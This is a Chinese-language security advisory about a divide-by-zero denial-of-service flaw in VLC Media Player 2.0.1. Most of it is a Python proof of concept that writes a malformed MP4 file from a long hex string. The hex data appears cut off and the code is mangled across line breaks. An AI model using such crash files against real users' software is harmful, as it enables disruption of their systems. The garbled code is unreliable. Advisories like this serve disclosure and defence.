VLC Media Player除零拒绝服务漏洞

VLC Media Player除零拒绝服务漏洞

发布日期：2012-04-20
更新日期：2012-04-23

受影响系统：
VideoLAN VLC Media Player 2.0.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53169

VLC Media Player是多媒体播放器（最初命名为VideoLAN客户端）是VideoLAN计划的多媒体播放器。

VLC Media Player在处理畸形.mp4文件时，在实现上存在拒绝服务漏洞，攻击者可利用此漏洞使受影响应用崩溃。

<*来源：Senator  
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Senator （）提供了如下测试方法：

Data =
"\x00\x00\x00\x1C\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x00\x01\x19\x28\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xC7\x21\xFC\x5B\xC7\x21\xFC\x5B\x00\x00\x02\x58\x00\x02\x22\xA8\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69\x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x29\x15\xFF\x00\x00\xA5\xE5\x74\x72\x61\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xC7\x21\xFC\x5B\xC7\x21\xFC\x5B\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x22\x9C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\xA5\x81\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xC7\x21\xFC\x5B\xC7\x21\xFC\x5B\x00\x00\x00\x00\x00\x9C\xF0\x00\x55\xC4\x00\x00\x00\x00\x00\x42\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x43\x29\x20\x32\x30\x30\x37\x20\x47\x6F\x6F\x67\x6C\x65\x20\x49\x6E\x63\x2E\x20\x76\x30\x38\x2E\x31\x33\x2E\x32\x30\x30\x37\x2E\x00\x00\x00\xA5\x17\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00\xA4\xDB\x73\x74\x62\x6C\x00\x00\x00\x5B\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x4B\x6D\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x10\x00\x00\x00\x00\xAC\x44\x00\x00\x00\x00\x00\x27\x65\x73\x64\x73\x00\x00\x00\x00\x03\x19\x00\x00\x00\x04\x11\x40\x15\x00\x01\xE6\x00\x02\x2D\x38\x00\x01\xCD\x28\x05\x02\x12\x10\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x27\x3C\x00\x00\x04\x00\x00\x00\x00\x28\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x16\x00\x00\x00\x01\x00\x00\x01\xC9\x00\x00\x00\x0C\x00\x00\x00\x01\x00\x00\x9D\x04\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x27\x3C\x00\x00\x00\x09\x00\x00\x00\x09\x00\x00\x00\x09\x00\x00\x00\x09\x00\x00\x00\x09\x00\x00\x00\x09\x00\x00\x01\x6D\x00\x00\x01\x5F\x00\x00\x01\x8E\x00\x00\x01\x76\x00\x00\x01\x7B\x00\x00\x01\x72\x00\x00\x01\x76\x00\x00\x01\x7E\x00\x00\x01\x75\x00\x00\x01\x7B\x00\x00\x01\x74\x00\x00\x01\x75\x00\x00\x01\x71\x00\x00\x01\x6B\x00\x00\x01\x61\x00\x00\x01\x63\x00\x00\x01\x6D\x00\x00\x01\x5E\x00\x00\x01\x66\x00\x00\x01\x5D\x00\x00\x01\x55\x00\x00\x01\x5D\x00\x00\x01\x66\x00\x00\x01\x66\x00\x00\x01\x60\x00\x00\x01\x59\x00\x00\x01\x56\x00\x00\x01\x54\x00\x00\x01\x68\x00\x00\x01\x4B\x00\x00\x01\x4D\x00\x00\x01\x51\x00\x00\x01\x4C\x00\x00\x01\x43\x00\x00\x01\x40\x00\x00\x01\x3D\x00\x00\x01\x2E\x00\x00\x01\x19\x00\x00\x01\x12\x00\x00\x01\x03\x00\x00\x01\x1D\x00\x00\x01\x1A\x00\x00\x01\x16\x00\x00\x01\x21\x00\x00\x01\x08\x00\x00\x01\x18\x00\x00\x01\x1A\x00\x00\x01\x09\x00\x00\x00\xFF\x00\x00\x00\xFF\x00\x00\x01\x01\x00\x00\x00\xFD\x00\x00\x00\xF7\x00\x00\x00\xF5\x00\x00\x01\x15\x00\x00\x01\x1A\x00\x00\x01\x17\x00\x00\x01\x09\x00\x00\x01\x0D\x00\x00\x01\x11\x00\x00\x01\x0F\x00\x00\x01\x14\x00\x00\x01\x09\x00\x00\x01\x19\x00\x00\x01\x03\x00\x00\x01\x0E\x00\x00\x00\xF8\x00\x00\x00\xEF\x00\x00\x01\x0E\x00\x00\x01\x10\x00\x00\x01\x12\x00\x00\x01\x0B\x00\x00\x01\x0D\x00\x00\x01\x0C\x00\x00\x01\x0C\x00\x00\x01\x11\x00\x00\x01\x07\x00\x00\x01\x0A\x00\x00\x01\x08\x00\x00\x01\x08\x00\x00\x01\x00\x00\x00\x01\x0D\x00\x00\x01\x09\x00\x00\x01\x01\x00\x00\x00\xFD\x00\x00\x01\x01\x00\x00\x00\xFF\x00\x00\x01\x05\x00\x00\x01\x01\x00\x00\x01\x02\x00\x00\x01\x09\x00\x00\x00\xFC\x00\x00\x00\xFE\x00\x00\x00\xFD\x00\x00\x01\x00\x00\x00\x01\x03\x00\x
avi
= open('poc.mp4', 'wb+')
avi.write(Data)
    
avi.close()
print
"[-] MP4 file generated"

建议：
--------------------------------------------------------------------------------
厂商补丁：

VideoLAN
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.videolan.org/